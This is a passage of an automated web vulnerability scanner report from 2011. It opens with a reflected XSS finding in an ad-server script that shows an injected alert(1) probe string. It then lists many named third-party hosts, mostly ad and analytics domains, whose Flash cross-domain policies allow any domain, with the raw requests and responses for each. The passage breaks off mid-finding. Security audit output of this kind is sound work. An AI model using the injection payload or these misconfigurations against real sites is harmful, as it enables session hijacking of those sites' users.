Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1283

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3179363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9420e"-alert(1)-"ad6a30360a0\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

6. Flash cross-domain policy previous next
There are 86 instances of this issue:

http://0.gravatar.com/crossdomain.xml
http://6e8d64.r.axf8.net/crossdomain.xml
http://a.tribalfusion.com/crossdomain.xml
http://ad-emea.doubleclick.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ad.turn.com/crossdomain.xml
http://admeld.adnxs.com/crossdomain.xml
http://ahome.disney.go.com/crossdomain.xml
http://ajax.googleapis.com/crossdomain.xml
http://aperture.displaymarketplace.com/crossdomain.xml
http://api.ak.facebook.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://c7.zedo.com/crossdomain.xml
http://cdn.gigya.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://cdn5.tribalfusion.com/crossdomain.xml
http://ctix8.cheaptickets.com/crossdomain.xml
http://d.xp1.ru4.com/crossdomain.xml
http://dar.youknowbest.com/crossdomain.xml
http://feeds.delicious.com/crossdomain.xml
http://fingerhut.tt.omtrdc.net/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://gannett.gcion.com/crossdomain.xml
http://gscounters.gigya.com/crossdomain.xml
http://i.w55c.net/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://metrics.fingerhut.com/crossdomain.xml
http://metrics.mcafee.com/crossdomain.xml
http://metrics.sonystyle.com/crossdomain.xml
http://metrics.us.playstation.com/crossdomain.xml
http://nexus2.ensighten.com/crossdomain.xml
http://p.brilig.com/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://pixel.33across.com/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://serv.adspeed.com/crossdomain.xml
http://sony.links.channelintelligence.com/crossdomain.xml
http://sony.links.origin.channelintelligence.com/crossdomain.xml
http://sony.tcliveus.com/crossdomain.xml
http://sony.tt.omtrdc.net/crossdomain.xml
http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml
http://sync.mathtag.com/crossdomain.xml
http://t.invitemedia.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://ttwbs.channelintelligence.com/crossdomain.xml
http://turn.nexac.com/crossdomain.xml
http://usatoday1.112.2o7.net/crossdomain.xml
http://w88.go.com/crossdomain.xml
http://webtrends.telegraph.co.uk/crossdomain.xml
http://www.viddler.com/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://api.tweetmeme.com/crossdomain.xml
http://content.usatoday.com/crossdomain.xml
http://contextweb.usatoday.net/crossdomain.xml
http://cookex.amp.yahoo.com/crossdomain.xml
http://dcl.wdpromedia.com/crossdomain.xml
http://dcl2.wdpromedia.com/crossdomain.xml
http://disneycruise.disney.go.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://i.usatoday.net/crossdomain.xml
http://images.scanalert.com/crossdomain.xml
http://imawow.weather.com/crossdomain.xml
http://login.dotomi.com/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://pubads.g.doubleclick.net/crossdomain.xml
http://s7d5.scene7.com/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://travel.travelocity.com/crossdomain.xml
http://travel.usatoday.com/crossdomain.xml
http://webassets.scea.com/crossdomain.xml
http://wow.weather.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.fingerhut.com/crossdomain.xml
https://www.fingerhut.com/crossdomain.xml
http://www.mcafeesecure.com/crossdomain.xml
https://www.mcafeesecure.com/crossdomain.xml
http://www.telegraph.co.uk/crossdomain.xml
http://www.orbitz.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://0.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://0.gravatar.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 16 May 2011 01:24:43 GMT
Expires: Mon, 16 May 2011 01:29:43 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://6e8d64.r.axf8.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://6e8d64.r.axf8.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 6e8d64.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:32:50 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://ad-emea.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.5. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 15 May 2011 21:21:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://ad.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:19:49 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.7. http://admeld.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.8. http://ahome.disney.go.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ahome.disney.go.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=10
Date: Mon, 16 May 2011 01:29:22 GMT
Content-Type: text/xml; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:29:15 GMT
Accept-Ranges: bytes
ETag: W/"8027cdaa6813cc1:10eb"
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=60D33DE2-6672-4C5F-A0C8-19715A096F8C; path=/; expires=Mon, 16-May-2031 01:29:22 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 01:29:25 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 453
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="dolimg.com" />
<allow-access-from domain="a.dolimg.com" />
<allow-access-from domain="home.disney.go.com" />
<allow-access-from domain="disney.go.com" />
<allow-access-from domain="hb.disney.go.com" />
...[SNIP]...

6.9. http://ajax.googleapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 85448

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.10. http://aperture.displaymarketplace.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aperture.displaymarketplace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:fe8"
Server: Microsoft-IIS/6.0
X-Server: D2G.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Mon, 16 May 2011 01:22:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:22:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

6.11. http://api.ak.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.ak.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
X-FB-Server: 10.36.9.114
X-Cnection: close
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 01:25:14 GMT
Date: Mon, 16 May 2011 01:25:14 GMT
Content-Length: 280
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.12. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 21:31:00 GMT
Date: Sun, 15 May 2011 21:31:00 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.13. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 16 May 2011 01:19:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.14. http://c7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6050
Date: Mon, 16 May 2011 01:30:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.15. http://cdn.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sun, 15 May 2011 21:19:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 16 May 2011 01:19:51 GMT
Date: Mon, 16 May 2011 01:19:51 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.17. http://cdn5.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 710
Content-Type: text/xml
Date: Sun, 15 May 2011 21:31:35 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.18. http://ctix8.cheaptickets.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ctix8.cheaptickets.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ctix8.cheaptickets.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:80c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:22:46 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://d.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:19:58 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.20. http://dar.youknowbest.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dar.youknowbest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dar.youknowbest.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://dar.youknowbest.com/crossdomain.xml
Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT
Accept-Ranges: bytes
ETag: "01e78cfe96cb1:de1"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: CO-ADSWEB01
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:41:16 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.21. http://feeds.delicious.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feeds.delicious.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:25:00 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.22. http://fingerhut.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fingerhut.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fingerhut.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:33:11 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 64028
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gannett.gcion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.25. http://gscounters.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gscounters.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2af5"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web205
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 21:19:57 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.26. http://i.w55c.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Mon, 16 May 2011 01:17:20 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" to-ports="*"/>
<site-control
...[SNIP]...

6.27. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.28. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 20:32:17 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.29. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 01:19:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.30. http://metrics.fingerhut.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.fingerhut.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.fingerhut.com

Response

